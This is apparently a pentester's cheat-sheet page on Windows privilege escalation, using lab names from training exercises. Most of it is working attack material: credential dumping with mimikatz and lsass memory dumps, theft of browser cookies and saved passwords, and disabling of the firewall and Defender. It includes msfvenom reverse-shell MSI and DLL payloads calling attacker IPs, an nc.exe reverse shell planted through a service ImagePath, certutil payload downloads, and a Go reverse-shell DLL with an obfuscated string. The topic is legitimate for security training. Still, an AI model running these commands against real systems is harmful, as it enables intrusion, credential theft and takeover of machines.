Windows Privilege Escalation

Windows Privilege Escalation

General and Useful shortlist command

powershell -ex bypass

  • add user

net user /add username password

  • add user to group

net localgroup groupname /add user
net group "Exchange Windows Permissions" svc-alfresco /add /domain

  • Enable rdp (need administrator)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

  • Disable firewall

netsh advfirewall set allprofiles state off

  • Enable only remote desktop

netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

  • Using nxc

netexec smb $IP -u administrator -p pass123 -M rdp -o ACTION=enable

  • Check permission on file or dir

cacls .
icacls .

  • share smb (on attacker machine)

impacket-smbserver -smb2support nameshare folder

  • Run as

run as /user:domain\samaccountname cmd.exe

  • Sharing folder using Dir properties -> https://youtu.be/jBfdlLybMek?si=qd9bu1ch_VPBO4Cm&t=8408

Initial Enumeration

User and Groups Enumeration

  • Logged-In user

query user

  • Current User

echo %USERNAME

  • Privilges

whoami /priv
whoami /alll

  • Groups Information

whoami /groups

  • All User on local machine

net user
net user /domain

  • All grous

net localgroup

  • Details about user

net user samname 
net user samname /domain

  • Detail about a group

net localgroup administrators

  • Pass policy

net accounts

  • Local User Description

Get-LocalUser

  • Computer Description

Get-WmiObject -Class Win32_OperatingSystem | select Description

OS and Process Enumeration

  • Info About OS

Get-WmiObject Win32_OperatingSystem | select -Property *

  • Process Running

tasklist /svc

  • Env variables set

  • Systeminfo

systeminfo

  • Patches and Updates

wmic qfe
Get-HotFix | ft -AutoSize

  • Installed programs

wmic product get name
Get-WmiObject -Class Win32_Product |  select Name, Version
Get-CimInstance -ClassName Win32_Product

  • Running Programs

Get-WmiObject Win32_Process | Format-List *

  • Running process and owner (not always work)

# other solution
Get-WmiObject Win32_Process | ForEach-Object {
    $process = $_
    $owner = $process.GetOwner()
    [PSCustomObject]@{
        ProcessName = $process.Name
        ProcessId   = $process.ProcessId
        User        = if ($owner.ReturnValue -eq 0) { "$($owner.Domain)\$($owner.User)" } else { "N/A" }
    }
} | Format-Table -AutoSize


# other solution
Get-CimInstance Win32_Process | ForEach-Object {
    $process = $_
    $owner = Invoke-CimMethod -MethodName GetOwner   -InputObject $process
    Write-Host $process.name $owner
} 

# other solution
$owners = @{} 
gwmi win32_process |% {try {$owners[$_.handle] = $_.getowner().user} catch{} } 
(get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}})

  • Get process on main windows (displayed)

gps | ? { $_.MainWindowTitle }

  • Running Process with open port

netstat -ano

  • Get all services

Get-CimInstance -ClassName Win32_service
sc query
sc query state= all | findstr "SERVICE_NAME"

  • Get info about services

Get-Service "ServiceName"

  • Get all scheduled tasks

schtasks /query /fo LIST /v

  • Enumerate installed programs

wmic product get name

  • Enumerate local ports

netstat -ano | findstr 6064

  • Enumerate Process ID

get-process -Id 3324
gps -Id 3324

  • Enumerate Running Service

    • get-service | ? {$_.DisplayName -like 'Druva*'}

    • Get-CimInstance Win32_Service | Format-List *

  • Modifying PowerShell Execution Policy

    • Set-ExecutionPolicy Bypass -Scope Process

  • Installed Programs without permission (works on winrm)

Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*'  | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty 'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'  | Where-Object { $_.DisplayName } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

  • Search program by name

Get-CimInstance -ClassName Win32_Product | Where-Object { $_.Name -like "*name*" } | Select-Object Name, Version

Process Monitor

  • procmon from powershell

while($true){  
	$process = Get-WmiObject Win32_Process | Select-Object CommandLine
	Start-Sleep 1  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
	Compare-Object -ReferenceObject $process -DifferenceObject $process2}

  • sysinternals

Procmon.exe

  • How use procmon from command line

procmon.exe /Minimized /Quiet /Backingfile C:\Logs\procmon.pml
Start-Sleep -Seconds 10
procmon.exe /Terminate
procmon.exe /OpenLog C:\Logs\procmon.pml /SaveAs C:\Logs\procmon.csv /SaveFilter /Minimized

  • Enumerate all services and process and print also current owner

# Function to get the owner of a process
function Get-ProcessOwner {
    param (
        [System.Diagnostics.Process]$Process
    )
    try {
        $processHandle = $Process.Handle
        $processSecurity = Get-WmiObject Win32_Process -Filter "Handle = '$processHandle'"
        $owner = $processSecurity.GetOwner()
        return "$($owner.Domain)\$($owner.User)"
    } catch {
        return "N/A"
    }
}

# Enumerate all processes
Write-Host "Processes:"
Get-Process | ForEach-Object {
    $owner = Get-ProcessOwner $_
    Write-Host "Process: $($_.Name) - ProcessId: $($_.Id) - Owner: $owner"
}

# Function to get the owner of a service
function Get-ServiceOwner {
    param (
        [string]$ServiceName
    )
    try {
        $service = Get-WmiObject Win32_Service -Filter "Name = '$ServiceName'"
        $owner = $service.GetOwner()
        return "$($owner.Domain)\$($owner.User)"
    } catch {
        return "N/A"
    }
}

# Enumerate all services
Write-Host "`nServices:"
Get-Service | ForEach-Object {
    $owner = Get-ServiceOwner $_.Name
    $serviceId = $_.Id
    Write-Host "Service: $($_.Name) - ServiceId: $serviceId - Owner: $owner"
}

Network

  • Get Info About IP and network card

ipconfig /all

  • ARP Table:

arp -a

  • Routing table

route print

Enumeration Protection

  • Windows Defender

Get-MpComputerStatus

  • AppLocker

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

  • Test AppLocker

Get-AppLockerPolicy -Local | Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone

  • Disable realtime

Set-MpPreference -DisableRealtimeMonitoring $true

Named Pipe

Searching File & Creds

Searching File

tree /f /a 
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

  • Find file

dir /s/b filename
dir /s/b \filename # on all system
dir /s/b *.log
dir /s/b *.txt
dir /s/b *.doc*
dir /s/b *.zip
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

  • Search only file name:

findstr /SI /M "password" *.xml *.ini *.txt

  • Search file content CMD:

findstr /si password *.xml *.ini *.txt *.config

  • Search file content PowerShell

select-string -Path <path>*.txt -Pattern password

  • Search file extension CMD

where /R C:\ *.config

  • Search file extension PowerShell

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Interesting File/Directories

  • From file extract extract password

gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

  • Interesting file

Unattend.xml

  • Sticky notes

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

  • PowerShell history

(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Powershell Command

Get-Credential API
Import-Clixml
Export-Clixml
runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Saved Credentials List

cmdkey /list

  • Execute SharpChrome for extracting data from DPAPI - https://github.com/GhostPack/SharpDPAPI/blob/master/README.md

SharpChrome.exe logins /unprotect

  • Password Manager

    • Keepass -> kdbx -> keepass2jhon -> hashcat/jhon

  • Mail

    • MailSniper

  • Lazagne - https://github.com/AlessandroZ/LaZagne - Credentials recovery project

lazagne.exe all

  • SessionGopher

Import-Module .\SessionGopher.ps1 
Invoke-SessionGopher -Target WINLPE-SRV01

Clear-Text Password in the Registry

  • Windows Autologon - If 1 is enabled

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

  • Putty session file

Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>
reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

Wifi Password

netsh wlan show profile
netsh wlan show profile  name="Wifi" key=clear

VHDX/VMDK

  • Mount Linux

guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
guestmount --add WEBSRV10.vhdx  --ro /mnt/vhdx/ -m /dev/sda1

Misconfiguration

  • AlwaysInstallelevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

  • Exploit

Import-Module .\PowerUp.ps1 
Write-UserAddMSI

  • Generating MSI

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi

  • Execute MSI

msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

  • BypassUAC - user account control

Share with write permssion

  • SCF on a File Share

    • Icon on attacker machine UNC IconFile=\\10.10.14.3\share\legit.ico

    • Starting Responder/Inveigh/InveighZero

    • Cracking using hashcat -m 5600

  • Malicious lnk file - LnkBomb LnkBomb

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Pillaging

  • Enumerate Installed applications

dir "C:\Program Files"

  • Using Registry Key

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

  • Enumerate Installed services

    • Websites

    • File Shares

    • Databases

    • Directory Services (such as Active Directory, Azure AD, etc.)

    • Name Servers

    • Deployment Services

    • Certificate Authority

    • Source Code Management Server

    • Virtualization

    • Messaging

    • Monitoring and Logging Systems

    • Backups

  • Sensitive Data

    • Keylogging

    • Screen Capture

    • Network Traffic Capture

    • Previous Audit reports

  • User Information

    • History files, interesting documents (.doc/x,.xls/x,password/.pass, etc)

    • Roles and Privileges

    • Web Browsers

      • Firefox %APPDATA%\Mozilla\Firefox\Profiles\<RANDOM>.default-release

        • copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

        • CookieExtractor CookieExtractor

      • Chrome

        • SharpChromium - SharpChromium

        • Fix copy for Invoke-SharpChromium copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"

        • InvokeSharpChromium - Invoke-SharpChromium

    • IM Clients

      • Slack/Teams

If Administrator privilege, we can run mimikatz

  • Run mimikatz mimikatz

mimikatz.exe
privilege:debug
log
sekurlsa::logonpassword

Windows User Privileges

SeImpersonate and SeAssignPrimaryToken

SeDebugPrivilege

  • Using procdump

procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe 
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

  • Exploit SYSTEM from child process

  • Get info about winlogon

tasklist
# proc id of winlogon of lsass
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(16452, "c:\windows\System32\cmd.exe", "")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process "lsass").id, "c:\windows\System32\cmd.exe", "")

SeTakeOwnershipPrivilege

Import-Module .\Enable-Privilege.ps1

  • https://github.com/fashionproof/EnableAllTokenPrivs

.\EnableAllTokenPrivs.ps1

  • Choosing Target File

Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

  • Checking File Ownership

cmd /c dir /q 'C:\\Department Shares\\Private\\IT'

  • Take Ownership

takeown /f 'C:\\Department Shares\\Private\\IT\\cred.txt'

  • Modify FILE ACL

icacls 'C:\\Department Shares\\Private\\IT\\cred.txt' /grant htb-student:F

Windows Groups Privileges

Backup Operators

  • Enable Flag SeBackupPrivileg https://github.com/giuliano108/SeBackupPrivilege

  • Resources -> Exploit

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

  • Start backup

diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit 
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

  • save system

reg save HKLM\\SYSTEM SYSTEM.SAV`
reg save hklm\system C:\temp\system.hive`

  • save sam

reg save HKLM\SAM SAM.SAV
reg save hklm\sam C:\temp\sam.hive

  • extracting using impacket

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

  • Extracting Cred from NTDS.dit

Install-Module DSInternals -Force
Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\\SYSTEM # or system.sav dipende da come lo abbiamo salvato prima
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

  • Extracting

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

  • Create a copy

robocopy /B E:\Windows\\NTDS .\ntds ntds.dit

Event Log Readers

net localgroup "Event Log Readers"
wevtutil qe Security /rd:true /f:text | Select-String "/user"
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

DnsAdmins

  • Generate malicious dll

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

  • Get info about group DNSAdmins

Get-ADGroupMember -Identity DnsAdmins

  • Change dll

dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll

  • Restart DNS Services (could be distruptive)

sc stop DNS
sc start DNS

  • Get SID user

wmic useraccount where name="netadm" get sid

  • Check permission on DNSService

sc.exe sdshow DNS

Hyper-V Administrators

Print Operators - SeLoadDriverPrivilege

whoami /priv
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
reg add HKCU\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\Tools\\Capcom.sys"

  • EnablePrivilges

EnableSeLoadDriverPrivilege.exe

  • Verifiy Driver is Loaded

.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom
reg delete HKCU\\System\\CurrentControlSet\\Capcom

Server Operators

  • Find Services that run in SYSTEM ad es., AppReadiness

sc qc AppReadiness

  • Check Permission with PsService

c:\Tools\PsService.exe security AppReadiness

  • Change binPath

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

  • Start Service

sc start AppReadiness

User Account Control

  • Checking if UAC is enabled

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

  • Checking UAC Level

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

  • Checking Windows Version

[environment]::OSVersion.Version

  • Reviewing PATH

cmd /c echo %PATH%`

Weak Permission

Permissive File System ACLs

  • Using

Sharphound.exe audit

for searching services modifiable ad es., SecurityService

  • Check permission

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

  • Change executable

cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"

  • Restart Services

sc start SecurityService

Weak Service Permissions

  • Run

Sharphound.exe audit

  • Using accesschk for reviewing permission about services

accesschk.exe /accepteula -quvcw WindscribeService

  • Query all services

sc query

  • Change binpath

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"

  • Stop service

sc stop WindscribeService

  • Restart

sc start WindscribeService

  • Reverting to initial state

sc config WindScribeService binpath="c:\\Program Files (x86)\\Windscribe\\WindscribeService.exe"
sc start WindScribeService`

  • In casi di permesso di shutdown e il servizio è autorun

shutdown -r -t 1

Unquoted Services

  • Querying service

sc qc SystemExplorerHelpService

  • Searching unquoted services

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Scheduled Task

schtasks /query /fo LIST /v
schtask /query /fo LIST /v /FN "Name"
Get-ScheduledTask | select TaskName,State

Permissive Registry ACLs

  • Checking Weak Service ACLs in Registry

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

  • Changing ImagePath with PowerShell

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"

  • Modifiable Registry Autorun Binary

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

  • https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html#privilege-escalation-with-autoruns

  • https://github.com/nickvourd/Windows-Local-Privilege-Escalation-Cookbook/blob/master/Notes/LogonAutostartExecutionRegistryRunKeys.md

Kernel Exploit

wmic qfe list brief

LOLBAS

  • Collection

  • Transfer file

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

  • Encodign File

certutil -encode file1 encodedfile

  • Decoding file

Certutil -decode encodedfile file2

  • Execute dll

rundll32.exe file.dll,methodName

DLL Injection/Hijacking

  • DLL injection

    • is a method that involves inserting a piece of code, structured as a Dynamic Link Library (DLL), into a running process.

    • Execute an arbitrary DLL inside another process

      1. Locate the process to inject the malicious DLL CreateToolhelp32Snapshot, Process32First, Process32Next

      2. Open the process: GetModuleHandle, GetProcAddress, OpenProcess

      3. Write the path to the DLL inside the process: VirtualAllocEx, WriteProcessMemory

      4. Create a thread in the process that will load the malicious DLL CreateRemoteThread, LoadLibrary

      5. Other functions to use: NTCreateThreadEx, RtlCreateUserThread

    • LoadLibrary

    • Manual Mapping

    • Resources

  • DLL Hijacking

    • DLL Hijacking is an exploitation technique where an attacker capitalizes on the Windows DLL loading process.

      • DLL Replacement: replace a legitimate DLL with an evil DLL. Combined with DLL Proxying

      • DLL Search Order Hijacking: Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL Ref -[Ref.]

      • Phantom DLL hijacking: Drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load.

      • DLL redirection: change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local .Ref [Ref.]

      • WinSxS DLL replacement: replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often DLL side-loading. Ref - [Ref.]

      • Relative path DLL Hijacking: Copy the legitimate application to a user-writable folder, alongside the evil DLL.

    • Find Missing DLL

      • procmonfilterResults contain not Found and → Paths end with .dll

    • To escalate privileges

      • Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.

      • Ensure write access is available for any directory in which the DLL will be searched for icacls “Path-To-Dir”

    • Tools

      • winpeas

      • siofra - Siofra

      • powersploit

        • Find-ProcessDLLHijack

        • Find-PathDLLHijack

        • Write-HijackDll

    • Resources

  • DLL Reflective

  • DLL SideLoading

  • DLL Proxying

    • Basically a Dll proxy is a Dll capable of execute your malicious code when loaded but also to expose and work as exected by relaying all the calls to the real library.

    • Get RevShell (N.B. is very important arch used)

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f dll -o injection.dll
msfvenom -p windows/shell_reverse_tcp LHOST=172.23.150.167 LPORT=4444 -f dll > injection.dll

  • msfconsole -> use multi/handler

  • Write Code

  • How to compile dll

  • x64

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll

  • x86

i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

  • Link to Windows Sockets 2, necessary for rev shell

i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared

  • Alternative use VisualStudio e C#

  • Using go:

package main

import (
  "C"
  "os/exec"
  "net"
)

//export VerifyThemeVersion 
func VerifyThemeVersion(){
  main()
}

func main() {
        dst := "192.168.1.152" // set ip
        pnum := "9999"  // set port
        connstring := dst + ":" + pnum
        prot := "tcp"
        netData, _ := net.Dial(prot, connstring)
        shell := exec.Command("pow" + "er" + "she" + "ll.e" + "xe")
        shell.Stdin=netData
        shell.Stdout=netData
        shell.Stderr=netData
        shell.Run()
}

# x86
OOS=windows GOARCH=386 CGO_ENABLED=1 CC=i686-w64-mingw32-gcc go build -buildmode=c-shared -o main.dll reverse_shell.go  
#amd64
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -buildmode=c-shared -ldflags="-w -s -H=windowsgui" -o evil.dll ./calculator.go

  • How to check if DLL work

rundll32.exe shell32.dll,Control_RunDLL C:\\Users\\sarah\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll
rundll32.exe injection.dll,0

  • Tools

    • Procmon

    • Process Explorer

    • VisualStudio

Resources

Tools

PreviousLinux Privilege EscalationNextAndroid Application Pentesting

Last updated